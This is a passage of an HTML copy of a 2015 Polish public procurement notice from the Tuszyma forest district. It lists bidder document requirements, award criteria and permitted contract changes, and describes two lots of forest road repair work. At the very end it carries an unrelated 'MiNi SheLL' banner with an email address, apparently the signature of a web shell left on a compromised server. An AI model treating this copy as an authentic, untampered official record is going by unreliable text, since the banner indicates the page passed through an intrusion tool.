<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>Jeżeli Wykonawca z uzasadnionej przyczyny nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełniania opisanego przez Zamawiającego warunku;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.W celu wykazania braku podstaw do wykluczenia z postępowania o których mowa w art. 24 ust. 1 oraz art. 24b ust. 3 ustawy Pzp, Wykonawca winien złożyć Oświadczenie o braku podstaw do wykluczenia z postępowania (formularz Oświadczenia znajduje się w Rozdziale III SIWZ). 2. Informację o tym, że Wykonawca nie należy do grupy kapitałowej o której mowa w art. 24 ust. 2 pkt. 5 Ustawy (Treść informacji zawiera pkt 5 Formularza Oferty. Złożenie podpisanego Formularza Oferty potwierdza złożenie informacji o braku przynależności do grupy kapitałowej). 3. W celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 Ustawy, określonych w niniejszym postępowaniu, Wykonawca winien złożyć Oświadczenie o spełnianiu warunków udziału w postępowaniu (formularz Oświadczenia znajduje się w Rozdziale III SIWZ). 4. W przypadku, gdy Wykonawca dla potwierdzenia spełniania warunków udziału w postępowaniu przedstawi dokumenty zawierające kwoty wyrażone w walutach innych niż złoty polski, wartości będą przeliczane w następujący sposób: 1) wartość zrealizowanych robót budowlanych - wg średniego kursu NBP z dnia podanego jako termin wykonania zamówienia (tj. dnia zakończenia realizacji zamówienia); 2) posiadane środki finansowe lub zdolność kredytowa - wg średniego kursu NBP z dnia wystawienia dokumentu; 3) wartość posiadanego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - wg średniego kursu NBP z dnia wystawienia dokumentu. 5. W przypadku Wykonawców wspólnie ubiegających się o zamówienie: 5.1. dokumenty wymienione w sekcji III.4.2 w zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 Ustawy powinny być przedłożone przez każdego z Wykonawców z osobna (odrębnie); 5.2. Oświadczenie o spełnianiu warunków udziału w postępowaniu powinno być przedłożone wspólnie w imieniu wszystkich Wykonawców albo przez każdego Wykonawcę odrębnie; w drugiej sytuacji Zamawiający będzie uważał, że każdy z Wykonawców złożył oświadczenie dotyczące tej części warunku, za której spełnienie jest odpowiedzialny; 5.3. dokumenty wymienione w Sekcji III.3.2.- Sekcji III.3.5. - powinny zostać złożone w taki sposób, aby wykazać, że warunki udziału w postępowaniu Wykonawcy spełniają łącznie ( tj. przez jednego lub kilku Wykonawców łącznie). 6. Jeżeli Wykonawca wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 Ustawy w zakresie określonym przez Zamawiającego tj. - posiadania wiedzy i doświadczenia, - dysponowania osobami zdolnymi do wykonania zamówienia, - dysponowania potencjałem technicznym, - sytuacji finansowej i ekonomicznej polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b Ustawy, Zamawiający w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do tych zasobów żąda: dokumentów dotyczących w szczególności: a)zakresu dostępnych Wykonawcy zasobów innego podmiotu, b) sposobu wykorzystania zasobów innego podmiotu przez Wykonawcę, przy wykonywaniu zamówienia, c)charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem, d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b ustawy, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. 7. W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w niniejszym punkcie. 8. Wypełniony formularz oferty. 9. Formularz dotyczący części wykonywanych z udziałem podwykonawców - jeżeli dotyczy. 10. Pełnomocnictwo podmiotów występujących wspólnie - jeśli dotyczy. 11. Pełnomocnictwo do złożenia oferty o ile umocowanie do złożenia oferty nie wynika z innych dokumentów załączonych przez Wykonawcę. 12. Oryginał gwarancji lub poręczenia - jeżeli Wykonawca wniósł wadium w innej formie niż pieniądz.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin wykonania: 5% - za termin krótszy od wymaganego o 7 dni, 10% - za termin krótszy od wymaganego o 14 dni. - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszystkie zmiany postanowień zawartej umowy wymagają zgody obu stron i zachowania formy pisemnej pod rygorem nieważności. Wprowadzenie zmian do umowy może wynikać z następujących okoliczności:
1.)	Zmiana Terminu Wykonania Umowy   
1.1) zmiany spowodowane warunkami atmosferycznymi, które spowodowały niezawinione  niemożliwe do uniknięcia przez Wykonawcę opóźnienie tj.:
a)	klęski żywiołowe mające wpływ na realizację przedmiotu zamówienia;
b)	warunki atmosferyczne odbiegające od typowych dla danej pory roku (nawalne deszcze, podtopienia) uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów;
1.2.) 	zmiany spowodowane warunkami geologicznymi, gruntowymi, archeologicznymi lub terenowymi których Wykonawca nie mógł przewidzieć w momencie sporządzania oferty przetargowej, które spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie, w szczególności:
a)	niewypały i niewybuchy;
b)	wykopaliska archeologiczne;
c)	nieprzewidziane warunki geologiczne i gruntowe;
1.3.) 	zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, które spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie, w szczególności:
a)	wstrzymanie robót przez Zamawiającego nie wynikające z przyczyn leżących po stronie Wykonawcy;
1.4)	zmiany będące następstwem działania organów administracji i innych podmiotów o kompetencjach zbliżonych do organów administracji w szczególności eksploatatorów infrastruktury oraz właścicieli gruntów, które spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie w szczególności:
a)	przekroczenie zakreślonych przez prawo lub regulaminy, a jeśli takich regulacji nie ma - typowych w danych okolicznościach, terminów wydawania przez organy administracji lub inne podmioty decyzji, zezwoleń, uzgodnień itp.;
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt 1.1 - 1.4 termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.  
2.)	Zmiana sposobu spełnienia świadczenia 
2.1)	Zmiany osobowe
a)	zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne  spełniające warunki określone przez Zamawiającego w specyfikacji istotnych warunków zamówienia, według polityki kadrowej Wykonawcy
Zmiana osób podanych w ofercie Wykonawcy przy pomocy których Wykonawca realizuje przedmiot umowy nie wymaga aneksu do umowy. Zmiana jest możliwa na osoby spełniające wymogi SIWZ, a dla skutecznej zmiany niezbędne jest uzyskanie uprzedniej zgody Zamawiającego na zaproponowaną osobę.
3.)	Pozostałe zmiany spowodowane następującymi okolicznościami:
a)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
b)	zmiana obowiązującej stawki VAT;  
c)	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy; Strony ustalają, że dopuszczają zmniejszenie zakresu zadań do wykonania, a zmniejszenie wynagrodzenia będzie obliczone w oparciu o ceny jednostkowe zawarte w kosztorysie, o którym mowa w pkt 19.1.5 SIWZ i stanowiącym Załącznik nr 3 do umowy z uwzględnieniem ilości rzeczywiście wykonanych prac. 
d)	zmiany uzasadnione okolicznościami o których mowa w art. 3571 Kodeksu cywilnego; 
e)	gdy zaistnieje inna okoliczność prawna, ekonomiczna lub techniczna, skutkująca niemożliwością wykonania lub należytego wykonania umowy zgodnie z SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl.bip/dg/rdlp_krosno/nadl_tuszyma/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Tuszyma, 39-321 Tuszyma 147..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2015 godzina 09:30, miejsce: Nadleśnictwo Tuszyma, 39-321 Tuszyma 147, Sekretariat Nadleśnictwa..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Bieżące utrzymanie dróg leśnych w Leśnictwach: Przecław, Przyłęk, Wojsław, Niwiska, Kamionka, Szkółkarskie Przecław..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bieżące utrzymanie dróg leśnych w Leśnictwach: Przecław, Przyłęk, Wojsław, Niwiska, Kamionka, Szkółkarskie Przecław obejmujące:
1.	Leśnictwo Przecław:
Remont drogi leśnej w oddz. 107 b o długości 140 m, szer. 3,5m polegający na:
- karczowaniu pni o średnicy 46-55 cm w gruntach kat. III-IV w ilości 10 szt.
- wyprofilowaniu i zagęszczeniu podłoża pod warstwy konstrukcyjne nawierzchni,
- wykonaniu nawierzchni z tłucznia 31,5 -63 mm z zaklinowaniem klińcem 4-31,5 mm, zagęszczeniem i zamiałowaniem o grubości warstwy po zagęszczeniu 15 cm,
- wykonaniu placu manewrowego o wym. 30x10 m poprzez wyprofilowanie i zagęszczenie podłoża oraz wykonanie nawierzchni jw.
2.   Leśnictwo Wojsław:	
1) Remont drogi leśnej w oddziale 11 a  o długości 100m, szer. 3,5 m polegający na:
- wyprofilowaniu i zagęszczeniu podłoża pod warstwy konstrukcyjne nawierzchni drogi,
- wykonaniu nawierzchni z tłucznia 31,5 -63 mm z zaklinowaniem klińcem 4-31,5 mm, zagęszczeniem i zamiałowaniem o grubości warstwy po zagęszczeniu 15 cm.
2) Remont drogi leśnej w oddz. 53d o długości 120 m, szer. 4m polegający na:
- karczowaniu pni o średnicy 46-55 cm w gruntach kat. III-IV w ilości 25 szt.,
- usunięciu warstwy ziemi urodzajnej - humusu gr 15 cm na powierzchni 480m2,
- dowiezieniu piasku w ilości ok. 160 m3, rozłożeniu na powierzchni 320 m2 (80x4m) - średnia grubość warstwy piasku 0,5 m,
- profilowaniu i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni drogi,
- wykonanie nawierzchni z tłucznia 31,5 -63 mm z zaklinowaniem klińcem 4-31,5 mm, zagęszczeniem i zamiałowaniem o grubości warstwy po zagęszczeniu 25 cm.

3. Leśnictwo Szkółkarskie Przecław:
Remont drogi leśnej Telefoniczna na długości 250 m, szer. 3,5 m polegający na:
- karczowaniu pni o średnicy 46-55 cm koparką podsiębierną w gruntach kat. III-IV w ilości 23 szt.
- wyprofilowaniu i zagęszczeniu podłoża pod warstwy konstrukcyjne nawierzchni drogi,
- wykonanie nawierzchni z tłucznia 31,5 -63 mm z zaklinowaniem klińcem 4-31,5 mm, zagęszczeniem i zamiałowaniem o grubości warstwy po zagęszczeniu 15 cm,
- utwardzenie nawierzchni placu składowego o wym. 20x10m  poprzez wyprofilowanie i zagęszczenie podłoża oraz wykonanie nawierzchni jw.
- wykonanie rowu odwadniającego na długości 20 m.

4. Leśnictwo Kamionka:
Remont drogi leśnej w oddz. 179-280 o długości 680 m i szer. 3,5 m polegający na:
- wyprofilowaniu i zagęszczeniu podłoża pod warstwy konstrukcyjne nawierzchni drogi,
- wykonanie nawierzchni z tłucznia 31,5 -63 mm z zaklinowaniem klińcem 4-31,5 mm, zagęszczeniem i zamiałowaniem o grubości warstwy po zagęszczeniu 15 cm,
- wykonanie rowu odwadniającego na długości 150 m.

5. Leśnictwo Przyłęk:
Remont drogi leśnej Madziarka o długości 4300 m i szer. 3,5 m polegający na:
- miejscowym zebraniu poboczy koparką na długości 2000 mb. Szerokość poboczy 0,75 m.
- wyprofilowaniu na mokro istniejącej nawierzchni tłuczniowej równiarką,
- miejscowym doziarnieniu wyprofilowanej nawierzchni klińcem 4-31,5mm, średnia grubość warstwy 5 cm na długości 1200 m,
- zagęszczeniu i zamiałowaniu nawierzchni.

6. Leśnictwo Niwiska:
1) Remont drogi leśnej Niwiska-Jeziórko o długości 1964 m i szer. 3,5 m polegający na:
- wyprofilowaniu na mokro istniejącej nawierzchni tłuczniowej równiarką,
- zagęszczeniu i zamiałowaniu wyprofilowanej nawierzchni,
- utwardzenie nawierzchni zjazdu o wym. 10x15 m  poprzez wyprofilowanie i zagęszczenie podłoża oraz wykonanie nawierzchni z tłucznia 31,5 -63 mm z zaklinowaniem klińcem 4-31,5 mm, zagęszczeniem i zamiałowaniem o grubości warstwy po zagęszczeniu 15 cm.
2) Remont drogi leśnej Skośna o długości 1952 m i szer. 3,5 m polegający na:
- wyprofilowaniu na mokro istniejącej nawierzchni tłuczniowej równiarką,
- zagęszczeniu i zamiałowaniu wyprofilowanej nawierzchni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.20-7, 45.23.31.42-6, 45.23.31.41-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin wykonania: 5% - za termin krótszy od wymaganego o 7 dni, 10% - za termin krótszy od wymaganego o 14 dni. - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Konserwacja odcinka drogi leśnej Przecław-Szkółki o długości 350 mb w Leśnictwie Szkółkarskim Przecław.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja odcinka drogi leśnej Przecław-Szkółki o długości 350 mb, szer. 3.5m w Leśnictwie Szkółkarskim Przecław polegająca na podwójnym powierzchniowym utrwaleniu istniejącej nawierzchni przy użyciu emulsji asfaltowej i grysów frakcji 8-12 (pierwsza warstwa)  i 2-5 mm (druga warstwa)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.20-7, 45.23.31.42-6, 45.23.31.41-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin wykonania: 5% - za termin krótszy od wymaganego o 7 dni, 10% - za termin krótszy od wymaganego o 14 dni. - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com